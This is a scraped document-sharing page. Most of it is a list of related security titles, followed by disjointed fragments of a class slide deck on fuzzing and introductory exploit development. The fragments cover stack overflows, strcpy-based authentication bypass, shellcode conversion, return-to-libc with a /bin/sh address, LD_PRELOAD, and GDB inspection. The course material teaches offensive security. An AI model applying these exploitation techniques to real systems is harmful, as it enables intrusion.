Lecture 4
No ratings yet
Lecture 4
31 pages
Fcs Notes
No ratings yet
Fcs Notes
167 pages
Lecture 27: Secure Coding & Wrap Up
No ratings yet
Lecture 27: Secure Coding & Wrap Up
57 pages
Fuzzing, Model-Based Testing, and Security: Focus On Office Business Applications (OBA)
No ratings yet
Fuzzing, Model-Based Testing, and Security: Focus On Office Business Applications (OBA)
3 pages
2 MemoryCorruption
No ratings yet
2 MemoryCorruption
77 pages
David Wagner CS 161 Computer Security Notes
No ratings yet
David Wagner CS 161 Computer Security Notes
14 pages
COMP3006 Secure Software Development Week5
No ratings yet
COMP3006 Secure Software Development Week5
43 pages
Software Security: Cybersecurity Specialization-Coursera
No ratings yet
Software Security: Cybersecurity Specialization-Coursera
25 pages
Chapter No. 02
No ratings yet
Chapter No. 02
64 pages
Hack into your Friends Computer
From Everand
Hack into your Friends Computer
Magelan Cyber Security
No ratings yet
Lecture6 Software Flaws
No ratings yet
Lecture6 Software Flaws
91 pages
Fuzz-Doc 1
No ratings yet
Fuzz-Doc 1
26 pages
Pwnable Writeup
No ratings yet
Pwnable Writeup
110 pages
AD1034651
No ratings yet
AD1034651
61 pages
Foundation Course for Advanced Computer Studies
From Everand
Foundation Course for Advanced Computer Studies
Franck Ismael Djédjé
No ratings yet
The Art of Fuzzing Slides
100% (1)
The Art of Fuzzing Slides
142 pages
09 FindingBugs
No ratings yet
09 FindingBugs
41 pages
4 Software
No ratings yet
4 Software
148 pages
Fuzzing: Hack, Art, and Science
No ratings yet
Fuzzing: Hack, Art, and Science
7 pages
Advanced Buffer Overflow Technique: Greg Hoglund
No ratings yet
Advanced Buffer Overflow Technique: Greg Hoglund
76 pages
2_MemoryCorruption
No ratings yet
2_MemoryCorruption
146 pages
Computer Science: Learn about Algorithms, Cybersecurity, Databases, Operating Systems, and Web Design
From Everand
Computer Science: Learn about Algorithms, Cybersecurity, Databases, Operating Systems, and Web Design
Jonathan Rigdon
No ratings yet
Android Exploitation - F0rki - Hackingnight 2013 06 06
No ratings yet
Android Exploitation - F0rki - Hackingnight 2013 06 06
51 pages
Arm
No ratings yet
Arm
16 pages
Slides Fuzzing Workshop Hack - Lu v1.0 WINAFLD
No ratings yet
Slides Fuzzing Workshop Hack - Lu v1.0 WINAFLD
232 pages
The Future of Exploitation Slides
No ratings yet
The Future of Exploitation Slides
48 pages
Module 03a Bug - Hunting
No ratings yet
Module 03a Bug - Hunting
23 pages
04 Code Auditing
No ratings yet
04 Code Auditing
41 pages
Smashing The Stack Smashing The Stack
100% (1)
Smashing The Stack Smashing The Stack
43 pages
Lecture 8
No ratings yet
Lecture 8
20 pages
Software Vulnerabiliites
No ratings yet
Software Vulnerabiliites
95 pages
Footprinting, Reconnaissance, Scanning and Enumeration Techniques of Computer Networks
From Everand
Footprinting, Reconnaissance, Scanning and Enumeration Techniques of Computer Networks
Dr. Hidaia Mahmood Alassouli
No ratings yet
Fundamentals of Exploits - Jan
No ratings yet
Fundamentals of Exploits - Jan
78 pages
2020Typestate-Guided Fuzzer For Discovering Use-After-free Vulnerabilities
No ratings yet
2020Typestate-Guided Fuzzer For Discovering Use-After-free Vulnerabilities
14 pages
Unit 1
No ratings yet
Unit 1
34 pages
Title - How To Break Software by James Whittaker
No ratings yet
Title - How To Break Software by James Whittaker
8 pages
A Review of Fuzzing Tools and Methods
No ratings yet
A Review of Fuzzing Tools and Methods
21 pages
Verse - Systems-Using LLMs To Generate Fuzz Generators
No ratings yet
Verse - Systems-Using LLMs To Generate Fuzz Generators
7 pages
Bufferoverflow
No ratings yet
Bufferoverflow
69 pages
2020MemLock - Memory Usage Guided Fuzzing
No ratings yet
2020MemLock - Memory Usage Guided Fuzzing
13 pages
Smashing The Stack: Launching or Preventing A Slammer-Like Worm
No ratings yet
Smashing The Stack: Launching or Preventing A Slammer-Like Worm
43 pages
2 1-SecureDesignPrinciples
No ratings yet
2 1-SecureDesignPrinciples
8 pages
02 CTRL Hijacking
No ratings yet
02 CTRL Hijacking
39 pages
An Introduction To Dynamic Analysis For R.E. (2020) PDF
No ratings yet
An Introduction To Dynamic Analysis For R.E. (2020) PDF
30 pages
A Journey Into Exploitation
No ratings yet
A Journey Into Exploitation
15 pages
Buffer Overflow Introduction
No ratings yet
Buffer Overflow Introduction
66 pages
Fuzzy Testing For Automotive Cyber-Security
No ratings yet
Fuzzy Testing For Automotive Cyber-Security
8 pages
Fuzzing For Neural Networks
No ratings yet
Fuzzing For Neural Networks
15 pages
Breaking Av Software 44con
No ratings yet
Breaking Av Software 44con
146 pages
StudyWise Final Manuscript
No ratings yet
StudyWise Final Manuscript
100 pages
Fortinet Report - Cyberthreat Predictions 2024
No ratings yet
Fortinet Report - Cyberthreat Predictions 2024
8 pages
Boo Fuzz
No ratings yet
Boo Fuzz
6 pages
Black Hat USA 2011 - Weapons of Targeted Attack: Modern Document Exploit Techniques (Paper)
No ratings yet
Black Hat USA 2011 - Weapons of Targeted Attack: Modern Document Exploit Techniques (Paper)
18 pages
OLExplore
No ratings yet
OLExplore
18 pages
Get Hands-On Penetration Testing on Windows: Unleash Kali Linux, PowerShell, and Windows debugging tools for security testing and analysis 1st Edition Phil Bramwell PDF ebook with Full Chapters Now
100% (9)
Get Hands-On Penetration Testing on Windows: Unleash Kali Linux, PowerShell, and Windows debugging tools for security testing and analysis 1st Edition Phil Bramwell PDF ebook with Full Chapters Now
48 pages
Android Testing
No ratings yet
Android Testing
12 pages
Turbo Intruder
No ratings yet
Turbo Intruder
22 pages
Advanced Penetration Testing, Exploit Writing, and Ethical Hacking
No ratings yet
Advanced Penetration Testing, Exploit Writing, and Ethical Hacking
2 pages
Vulnerability Analysis in SOA-Based Business Processes
No ratings yet
Vulnerability Analysis in SOA-Based Business Processes
14 pages
Andrey Konovalov Fuzzing The Linux Kernel
No ratings yet
Andrey Konovalov Fuzzing The Linux Kernel
70 pages
SoC Fuzzing Intro
No ratings yet
SoC Fuzzing Intro
22 pages
[FREE PDF sample] Gray Hat Hacking: The Ethical Hacker's Handbook, Fifth Edition Daniel Regalado ebooks
100% (2)
[FREE PDF sample] Gray Hat Hacking: The Ethical Hacker's Handbook, Fifth Edition Daniel Regalado ebooks
62 pages
FuzzBuilder-Automated Building Greybox Fuzzing Environment For C - C++ Library
No ratings yet
FuzzBuilder-Automated Building Greybox Fuzzing Environment For C - C++ Library
11 pages
SANS SEC568 Think Red Act Blue
No ratings yet
SANS SEC568 Think Red Act Blue
2 pages
Hello Peach 1
No ratings yet
Hello Peach 1
23 pages
snipuzz
No ratings yet
snipuzz
15 pages
SDET Interview Questions
No ratings yet
SDET Interview Questions
52 pages
Fuzzing and Finding Vulnerabilities With Winafl/Afl
No ratings yet
Fuzzing and Finding Vulnerabilities With Winafl/Afl
4 pages
ECPPTv 2
No ratings yet
ECPPTv 2
12 pages
Attack Surface Calculation For Smart Contracts V3
No ratings yet
Attack Surface Calculation For Smart Contracts V3
8 pages
5. Attacking Web Applications With Ffuf
No ratings yet
5. Attacking Web Applications With Ffuf
24 pages
Discover XSS Security Flaws by Fuzzing With Burp Suite
No ratings yet
Discover XSS Security Flaws by Fuzzing With Burp Suite
19 pages
Tools Catalog
No ratings yet
Tools Catalog
183 pages
Oracle Database Communication Protocol PDF
No ratings yet
Oracle Database Communication Protocol PDF
65 pages

07 Fuzzing & Exploit Dev 101

Uploaded by

07 Fuzzing & Exploit Dev 101

Uploaded by

Fuzzing and Exploit

provided for the in class exercises

I'll just let you guys

● There's always the debate than when Anon

○ most modern processors implement small parts of

FM is really, really difficult

So lets get to it!

Sometimes, its like patching up an

Most exploits can be generalized into a three step process

cited from [1]

Wikipedia defines fuzz testing as:

cited from [1]

cited from [1]

cited from [1]

■ unpacked and decoded in python, this is: 'U','\xcd','\xab','\xcc','\

Anyone in linux/unix systems can manipulate their environment variables

In windows, requires administrator access

● LD_PRELOAD is an environment variable

There are also Temporal, and Environmental metrics

Initialized global & static variables DATA

machine instructions / code segments 0x00000000

int function(char *buf){

int function(char *buf){

int function(char *buf){ $EIP will point here

int function(char *buf){

dynamic space ------HEAP----->

Stack grows towards low memory

Heap grows towards high memory

strcpy(password_buffer, password); strcpy(password_buffer, password);

return auth_flag; return auth_flag;

return address (ret)

main()'s stack frame

these get pushed prior return address (ret)

Goto slides @ the end to see walkthroughs

● Its simple and sweet

pushes in order on the stack: LOW MEMORY

● then return address vuln buffer

● getting the vulnerable process to exit cleanly /bin/sh addr

Goto slides @ the end to see walkthroughs

machine instructions / code segments 0x00000000

Initialized global & static variables ----> Data

Program scratch space ----------------->

[1] Mitch Adair - UTDallas Computer Security Group. http://utdcsg.org/csg/

Lets use auth_overflow2.c from HAOE.

reader@hacking:~/booksrc $ gcc -g auth_overflow2.c -o auth_overflow2

x/24s $esp + 0x1FF

$ for i in $(cat shellcode.hex); do echo -en $i; done > shellcode.bin

Then shellcode.bin will be in binary.

check the result via:

int main(int argc, char *argv[])

We're going to demonstrate return to libc with this

int main(int argc, char *argv[]){

Use GDB to find their addresses

These may differ for you

Now to find the RET value on the stack

can do it by binary fuzzing, or examining the stack values with GDB

Should give us:

You might also like